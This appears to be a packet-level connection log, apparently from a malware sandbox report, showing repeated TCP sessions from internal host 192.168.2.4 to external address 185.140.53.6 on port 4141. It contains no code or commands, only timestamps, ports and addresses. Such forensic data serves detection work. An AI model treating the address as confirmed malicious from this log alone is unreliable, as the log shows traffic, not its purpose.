Jan 24, 2022 02:25:59.948790073 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.948796988 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.948815107 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.948836088 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.948892117 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.948932886 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.948986053 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.949245930 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.949287891 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.949326038 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.949347973 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.949381113 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.949438095 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.949598074 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.949639082 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.949659109 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.949683905 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.949795961 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.949856997 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.949991941 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.950030088 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.950082064 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.950108051 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.950153112 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.950279951 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.952868938 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.952909946 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.952941895 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.952960968 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.953001976 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.953049898 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.953182936 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.953244925 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.953414917 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.953457117 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.953471899 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.953495979 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.953510046 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.953543901 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.004153013 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.046701908 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.046746016 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.046777010 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.046803951 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.048724890 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.048764944 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.048785925 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.048796892 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.048810005 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.048837900 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.059402943 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.059467077 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.059510946 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.059544086 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.059571028 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.059581041 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.059681892 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.059731960 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.059869051 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.059910059 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.059912920 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.059950113 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.060044050 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.060091019 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.060146093 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.060192108 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.060216904 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.060257912 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.060334921 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.060378075 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.060477972 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.060667038 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.060714960 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.060775042 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.060818911 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.060847044 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.060888052 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.061023951 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.061067104 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.061108112 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.061151028 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.066766977 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.066824913 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.066842079 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.066865921 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.066871881 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.066905975 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.066957951 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.066997051 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.067003012 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.067037106 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.067159891 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.067205906 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.067285061 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.067328930 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.067477942 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.067517042 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.067528009 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.067558050 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.067708969 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.067755938 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.067815065 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.067872047 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.067883015 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.067926884 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.068067074 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.068115950 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.068156958 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.068202972 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.068280935 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.068324089 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.068409920 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.068459988 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.068521023 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.068569899 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.068939924 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.068978071 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.068989038 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.069020033 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.069161892 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.069200993 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.069207907 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.069240093 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.069243908 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.069283009 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.071393967 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.072154045 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.080625057 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.080682039 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.080697060 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.080724955 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:00.111814022 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.111870050 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:00.111996889 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:04.137576103 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:04.227680922 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:04.227807999 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:04.236531019 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:04.503307104 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:04.503753901 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:04.793962955 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:04.794073105 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:04.982765913 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:04.982856035 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:05.330820084 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:05.330893993 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:05.617173910 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:05.617286921 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:05.818425894 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:05.821060896 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:05.835171938 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:05.835304022 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:05.963574886 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:05.963641882 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:05.963680029 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:05.963737011 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:05.963781118 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:05.963906050 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:05.963967085 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.053581953 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.055977106 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.056021929 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.056063890 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.059784889 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.059847116 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.059906006 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.060111046 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.060331106 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.060350895 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.061806917 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.061868906 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.129534960 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.183478117 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.183540106 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.183577061 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.183615923 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.183619022 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.183646917 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.183675051 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.183691025 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.183931112 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.183990955 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.183995008 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.184046984 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.184072018 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.184171915 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.184237003 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.184307098 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.184361935 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.184444904 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.184580088 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.184642076 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.184695005 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.184755087 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.184792995 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.184843063 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.184881926 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.184942007 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.184956074 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.185146093 CET	4141	49827	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:06.185158014 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:06.185214043 CET	49827	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:10.221518993 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:10.485106945 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:10.485214949 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:10.485869884 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:10.976556063 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:10.976660013 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:11.283205032 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:11.283294916 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:11.400419950 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:11.400533915 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:11.693685055 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:11.695406914 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:11.910603046 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:11.912182093 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:11.912328005 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.014046907 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.014154911 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.014517069 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.014575958 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.015019894 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.015074968 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.015661955 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.015723944 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.113790035 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.113893032 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.122616053 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.122665882 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.122859955 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.122912884 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.123007059 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.123044968 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.123055935 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.123090982 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.123187065 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.123235941 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.123377085 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.123428106 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.129689932 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.130347967 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.218533039 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.218592882 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.218935966 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.219163895 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.219389915 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.219590902 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.219944000 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.219990015 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.220798016 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.220839977 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.221309900 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.221534014 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.222276926 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.222320080 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.222753048 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.222800016 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.223366976 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.223460913 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.224797010 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.224865913 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.225240946 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.225281000 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.226591110 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.226980925 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.227106094 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.227150917 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.228487968 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.228543997 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.229003906 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.229159117 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.229357004 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.229403019 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.364528894 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.364572048 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.364595890 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.364619970 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.364715099 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.364737034 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.364769936 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.364774942 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.364799023 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.364995956 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.365046978 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.366851091 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.366920948 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.366986990 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.367001057 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.367047071 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.370934010 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.371082067 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.371155024 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.371264935 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.371314049 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.454680920 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.457616091 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.469280958 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.469310045 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.469393969 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.469455004 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.469499111 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.469512939 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.469566107 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.469635010 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.469765902 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.469814062 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.469857931 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.469914913 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.469970942 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.470019102 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.470057011 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.470101118 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.471071005 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.471129894 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.473619938 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.473654032 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.473680973 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.473711014 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.473750114 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.473769903 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.473902941 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.473953962 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.474013090 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.474057913 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.474183083 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.474230051 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.474273920 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.474313974 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.474412918 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.474458933 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.533221006 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.543876886 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.543905973 CET	4141	49831	185.140.53.6	192.168.2.4
